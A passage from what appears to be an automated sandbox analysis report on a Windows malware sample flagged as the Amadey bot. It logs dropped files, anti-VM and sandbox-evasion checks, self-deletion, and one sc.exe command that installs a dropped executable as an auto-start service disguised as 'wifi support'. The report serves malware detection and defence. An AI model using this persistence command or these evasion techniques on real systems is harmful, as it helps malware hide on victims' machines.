                          Source: 22.2.8EC4.exe.fa0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 22.0.8EC4.exe.fa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 22.0.8EC4.exe.fa0000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 22.0.8EC4.exe.fa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 22.0.8EC4.exe.fa0000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 22.0.8EC4.exe.fa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 22.0.8EC4.exe.fa0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 40.0.8EC4.exe.610000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 40.0.8EC4.exe.610000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 40.0.8EC4.exe.610000.9.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 40.0.8EC4.exe.610000.9.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 40.2.8EC4.exe.610000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 40.2.8EC4.exe.610000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 40.0.8EC4.exe.610000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 40.0.8EC4.exe.610000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'

                          Persistence and Installation Behavior:

                          barindex
                          Yara detected Amadey botShow sources
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 00000030.00000002.940319035.00000000007A9000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000030.00000002.942563144.00000000007CC000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000030.00000002.943525106.00000000007D4000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000030.00000002.934963218.0000000000751000.00000004.00000001.sdmp, type: MEMORY
                          Drops executables to the windows directory (C:\Windows) and starts themShow sources
                          Source: unknownExecutable created and started: C:\Windows\SysWOW64\shayesoq\lagavljy.exe
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\uufaeeaJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile created: C:\Users\user\AppData\LocalLow\sG8rM8v\vcruntime140.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile created: C:\Users\user\AppData\LocalLow\sG8rM8v\freebl3.dllJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\7801.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile created: C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleMarshal.dllJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\86C4.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile created: C:\Users\user\AppData\LocalLow\sG8rM8v\nssdbm3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile created: C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleHandler.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile created: C:\Users\user\AppData\LocalLow\sG8rM8v\qipcap.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeFile created: C:\Users\user\AppData\Local\Temp\lagavljy.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile created: C:\Users\user\AppData\LocalLow\sqlite3.dllJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\ACEF.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\7CA1.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8ED5.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\BEB3.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile created: C:\Users\user\AppData\LocalLow\sG8rM8v\MapiProxy.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile created: C:\Users\user\AppData\LocalLow\sG8rM8v\breakpadinjector.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile created: C:\Users\user\AppData\LocalLow\sG8rM8v\IA2Marshal.dllJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\9A02.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile created: C:\Users\user\AppData\LocalLow\sG8rM8v\softokn3.dllJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\CC60.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\shayesoq\lagavljy.exe (copy)Jump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D984.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile created: C:\Users\user\AppData\LocalLow\sG8rM8v\ldap60.dllJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\E666.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile created: C:\Users\user\AppData\LocalLow\sG8rM8v\prldap60.dllJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B58B.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile created: C:\Users\user\AppData\LocalLow\sG8rM8v\libEGL.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile created: C:\Users\user\AppData\LocalLow\sG8rM8v\ldif60.dllJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8EC4.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile created: C:\Users\user\AppData\LocalLow\sG8rM8v\lgpllibs.dllJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\uufaeeaJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeFile created: C:\Users\user\AppData\LocalLow\sG8rM8v\ucrtbase.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\shayesoq\lagavljy.exe (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\shayesoq
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create shayesoq binPath= "C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d\"C:\Users\user\AppData\Local\Temp\86C4.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeCode function: 21_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                          Hooking and other Techniques for Hiding and Protection:

                          barindex
                          Deletes itself after installationShow sources
                          Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\u3e7zmaux2.exeJump to behavior
                          Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                          Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\uufaeea:Zone.Identifier read attributes | delete
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_0040C2E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion:

                          barindex
                          Found evasive API chain (may stop execution after checking mutex)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
                          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                          Source: U3E7zMaux2.exe, 00000001.00000002.713262263.00000000006A7000.00000004.00000020.sdmp, E666.exe, 00000013.00000002.784251113.000000000072B000.00000004.00000020.sdmpBinary or memory string: ASWHOOK
                          Found evasive API chain (may stop execution after checking locale)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeEvasive API call chain: GetUserDefaultLangID, ExitProcess
                          Checks if the current machine is a virtual machine (disk enumeration)Show sources
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\uufaeeaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\uufaeeaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\uufaeeaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\uufaeeaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\uufaeeaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\uufaeeaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Local\Temp\E666.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Local\Temp\E666.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Local\Temp\E666.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Local\Temp\E666.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Local\Temp\E666.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Local\Temp\E666.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeEvasive API call chain: GetPEB, DecisionNodes, Sleep
                          Contains functionality to detect sleep reduction / modificationsShow sources
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_00406AA0
                          Found evasive API chain (may stop execution after checking computer name)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeEvasive API call chain: GetComputerName,DecisionNodes,Sleep
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
                          Source: C:\Windows\SysWOW64\svchost.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
                          Source: C:\Windows\explorer.exe TID: 7128Thread sleep time: -31300s >= -30000s
                          Source: C:\Windows\explorer.exe TID: 7116Thread sleep time: -31300s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exe TID: 2228Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 5896Thread sleep time: -180000s >= -30000s
                          Source: C:\Windows\SysWOW64\svchost.exe TID: 5532Thread sleep count: 42 > 30
                          Source: C:\Windows\SysWOW64\svchost.exe TID: 5532Thread sleep time: -42000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\7801.exe TID: 5040Thread sleep time: -120000s >= -30000s
                          Source: C:\Windows\SysWOW64\svchost.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\Desktop\U3E7zMaux2.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 605
                          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 408
                          Source: C:\Users\user\AppData\Local\Temp\D984.exeAPI coverage: 0.3 %
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exeAPI coverage: 6.9 %
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_00406AA0
                          Source: C:\Users\user\AppData\Local\Temp\7801.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\MapiProxy.dllJump to dropped file
